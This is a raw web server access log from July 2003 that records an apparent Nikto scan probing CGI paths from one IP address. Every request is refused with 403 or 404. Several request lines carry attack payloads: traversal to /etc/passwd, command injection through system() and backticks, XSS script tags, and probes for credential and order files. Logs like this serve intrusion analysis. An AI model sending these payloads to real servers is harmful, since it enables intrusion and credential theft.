[24/Jul/2003:01:49:20 +0900] "GET /cgi.cgi/cgiwrap/~daemon HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:21 +0900] "GET /cgi-bin/cgiwrap/~daemon HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:21 +0900] "GET /cgi.cgi/cgiwrap/~ftp HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:22 +0900] "GET /cgi-bin/cgiwrap/~ftp HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:23 +0900] "GET /cgi.cgi/cgiwrap/~guest HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:24 +0900] "GET /cgi-bin/cgiwrap/~guest HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:24 +0900] "GET /cgi.cgi/cgiwrap/~listen HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:25 +0900] "GET /cgi-bin/cgiwrap/~listen HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:26 +0900] "GET /cgi.cgi/cgiwrap/~lp HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:26 +0900] "GET /cgi-bin/cgiwrap/~lp HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:27 +0900] "GET /cgi.cgi/cgiwrap/~mysql HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:28 +0900] "GET /cgi-bin/cgiwrap/~mysql HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:29 +0900] "GET /cgi.cgi/cgiwrap/~noaccess HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:29 +0900] "GET /cgi-bin/cgiwrap/~noaccess HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:30 +0900] "GET /cgi.cgi/cgiwrap/~nobody HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:31 +0900] "GET /cgi-bin/cgiwrap/~nobody HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:31 +0900] "GET /cgi.cgi/cgiwrap/~nobody4 HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:32 +0900] "GET /cgi-bin/cgiwrap/~nobody4 HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:33 +0900] "GET /cgi.cgi/cgiwrap/~nuucp HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:34 +0900] "GET /cgi-bin/cgiwrap/~nuucp HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:34 +0900] "GET /cgi.cgi/cgiwrap/~operator HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:35 +0900] "GET /cgi-bin/cgiwrap/~operator HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:36 +0900] "GET /cgi.cgi/cgiwrap/~root HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:36 +0900] "GET /cgi-bin/cgiwrap/~root HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:37 +0900] "GET /cgi.cgi/cgiwrap/~smmsp HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:38 +0900] "GET /cgi-bin/cgiwrap/~smmsp HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:39 +0900] "GET /cgi.cgi/cgiwrap/~smtp HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:39 +0900] "GET /cgi-bin/cgiwrap/~smtp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:40 +0900] "GET /cgi.cgi/cgiwrap/~sshd HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:41 +0900] "GET /cgi-bin/cgiwrap/~sshd HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:41 +0900] "GET /cgi.cgi/cgiwrap/~sys HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:42 +0900] "GET /cgi-bin/cgiwrap/~sys HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:43 +0900] "GET /cgi.cgi/cgiwrap/~test HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:44 +0900] "GET /cgi-bin/cgiwrap/~test HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:44 +0900] "GET /cgi.cgi/cgiwrap/~unknown HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:45 +0900] "GET /cgi-bin/cgiwrap/~unknown HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:46 +0900] "GET /cgi.cgi/cgiwrap/~uucp HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:46 +0900] "GET /cgi-bin/cgiwrap/~uucp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:47 +0900] "GET /cgi.cgi/cgiwrap/~web HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:48 +0900] "GET /cgi-bin/cgiwrap/~web HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:49 +0900] "GET /cgi.cgi/cgiwrap/~www HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:49 +0900] "GET /cgi-bin/cgiwrap/~www HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:50 +0900] "GET /cgi.cgi/cgiwrap/~xxxxx HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:51 +0900] "GET /cgi-bin/cgiwrap/~xxxxx HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:52 +0900] "GET /cgi.cgi/cgiwrap/~xxxxx HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:52 +0900] "GET /cgi-bin/cgiwrap/~xxxxx HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:53 +0900] "GET /cgi.cgi/cgiwrap/~root HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:54 +0900] "GET /cgi-bin/cgiwrap/~root HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:54 +0900] "GET /cgi.cgi/cgiwrap/~root HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:55 +0900] "GET /cgi-bin/cgiwrap/~root HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:56 +0900] "GET /cgi.cgi/change-your-password.pl HTTP/1.0" 403 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:57 +0900] "GET /cgi-bin/change-your-password.pl HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:57 +0900] "GET /cgi.cgi/class/mysql.class HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:58 +0900] "GET /cgi-bin/class/mysql.class HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:59 +0900] "GET /cgi.cgi/classified.cgi HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:49:59 +0900] "GET /cgi-bin/classified.cgi HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:00 +0900] "GET /cgi.cgi/classifieds HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:01 +0900] "GET /cgi-bin/classifieds HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:02 +0900] "GET /cgi.cgi/classifieds.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:02 +0900] "GET /cgi-bin/classifieds.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:03 +0900] "GET /cgi.cgi/classifieds/classifieds.cgi HTTP/1.0" 403 311 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:04 +0900] "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0" 404 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:04 +0900] "GET /cgi.cgi/clickcount.pl?view=test HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:05 +0900] "GET /cgi-bin/clickcount.pl?view=test HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:06 +0900] "GET /cgi.cgi/clickresponder.pl HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:07 +0900] "GET /cgi-bin/clickresponder.pl HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:07 +0900] "GET /cgi.cgi/code.php HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:08 +0900] "GET /cgi-bin/code.php HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:09 +0900] "GET /cgi.cgi/code.php3 HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:09 +0900] "GET /cgi-bin/code.php3 HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:10 +0900] "GET /cgi.cgi/commandit.cgi HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:11 +0900] "GET /cgi-bin/commandit.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:12 +0900] "GET /cgi.cgi/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:12 +0900] "GET /cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:13 +0900] "GET /cgi.cgi/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:14 +0900] "GET /cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:15 +0900] "GET /cgi.cgi/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:15 +0900] "GET /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:16 +0900] "GET /cgi.cgi/compatible.cgi HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:17 +0900] "GET /cgi-bin/compatible.cgi HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:17 +0900] "GET /cgi.cgi/Count.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:18 +0900] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:19 +0900] "GET /cgi.cgi/count.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:20 +0900] "GET /cgi-bin/count.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:20 +0900] "GET /cgi.cgi/counter-ord HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:21 +0900] "GET /cgi-bin/counter-ord HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:22 +0900] "GET /cgi.cgi/counterbanner HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:22 +0900] "GET /cgi-bin/counterbanner HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:23 +0900] "GET /cgi.cgi/counterbanner-ord HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:24 +0900] "GET /cgi-bin/counterbanner-ord HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:25 +0900] "GET /cgi.cgi/counterfiglet-ord HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:25 +0900] "GET /cgi-bin/counterfiglet-ord HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:26 +0900] "GET /cgi.cgi/counterfiglet/nc/ HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:27 +0900] "GET /cgi-bin/counterfiglet/nc/ HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:27 +0900] "GET /cgi.cgi/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:28 +0900] "GET /cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:29 +0900] "GET /cgi.cgi/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:30 +0900] "GET /cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:30 +0900] "GET /cgi.cgi/csh HTTP/1.0" 403 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:31 +0900] "GET /cgi-bin/csh HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:32 +0900] "GET /cgi.cgi/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:32 +0900] "GET /cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:33 +0900] "GET /cgi.cgi/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:34 +0900] "GET /cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:35 +0900] "GET /cgi.cgi/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd` HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:39 +0900] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd` HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:40 +0900] "GET /cgi.cgi/cstat.pl HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:41 +0900] "GET /cgi-bin/cstat.pl HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:42 +0900] "GET /cgi.cgi/cvsblame.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:43 +0900] "GET /cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:44 +0900] "GET /cgi.cgi/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:45 +0900] "GET /cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:46 +0900] "GET /cgi.cgi/cvslog.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:47 +0900] "GET /cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:48 +0900] "GET /cgi.cgi/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:49 +0900] "GET /cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:50 +0900] "GET /cgi.cgi/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:50 +0900] "GET /cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:51 +0900] "GET /cgi.cgi/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:52 +0900] "GET /cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:53 +0900] "GET /cgi.cgi/c_download.cgi HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:53 +0900] "GET /cgi-bin/c_download.cgi HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:55 +0900] "GET /cgi.cgi/dasp/fm_shell.asp HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:56 +0900] "GET /cgi-bin/dasp/fm_shell.asp HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:57 +0900] "GET /cgi.cgi/day5datacopier.cgi HTTP/1.0" 403 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:58 +0900] "GET /cgi-bin/day5datacopier.cgi HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:58 +0900] "GET /cgi.cgi/day5datanotifier.cgi HTTP/1.0" 403 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:50:59 +0900] "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:00 +0900] "GET /cgi.cgi/db2www/library/document.d2w/show HTTP/1.0" 403 316 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:00 +0900] "GET /cgi-bin/db2www/library/document.d2w/show HTTP/1.0" 404 312 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:01 +0900] "GET /cgi.cgi/db4web_c/dbdirname//etc/passwd HTTP/1.0" 403 314 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:02 +0900] "GET /cgi-bin/db4web_c/dbdirname//etc/passwd HTTP/1.0" 404 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:03 +0900] "GET /cgi.cgi/dbman/db.cgi?db=no-db HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:03 +0900] "GET /cgi-bin/dbman/db.cgi?db=no-db HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:04 +0900] "GET /cgi.cgi/db_manager.cgi HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:05 +0900] "GET /cgi-bin/db_manager.cgi HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:05 +0900] "GET /cgi.cgi/DCFORMS98.CGI HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:06 +0900] "GET /cgi-bin/DCFORMS98.CGI HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:07 +0900] "GET /cgi.cgi/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:08 +0900] "GET /cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:08 +0900] "GET /cgi.cgi/dcshop/auth_data/auth_user_file.txt HTTP/1.0" 403 319 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:09 +0900] "GET /cgi-bin/dcshop/auth_data/auth_user_file.txt HTTP/1.0" 404 315 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:10 +0900] "GET /cgi.cgi/DCShop/auth_data/auth_user_file.txt HTTP/1.0" 403 319 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:11 +0900] "GET /cgi-bin/DCShop/auth_data/auth_user_file.txt HTTP/1.0" 404 315 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:11 +0900] "GET /cgi.cgi/dcshop/orders/orders.txt HTTP/1.0" 403 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:12 +0900] "GET /cgi-bin/dcshop/orders/orders.txt HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:13 +0900] "GET /cgi.cgi/DCShop/orders/orders.txt HTTP/1.0" 403 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:13 +0900] "GET /cgi-bin/DCShop/orders/orders.txt HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:14 +0900] "GET /cgi.cgi/dfire.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:15 +0900] "GET /cgi-bin/dfire.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:16 +0900] "GET /cgi.cgi/diagnose.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:16 +0900] "GET /cgi-bin/diagnose.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:51:17 +0900] "GET /cgi.cgi/dig.cgi HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - 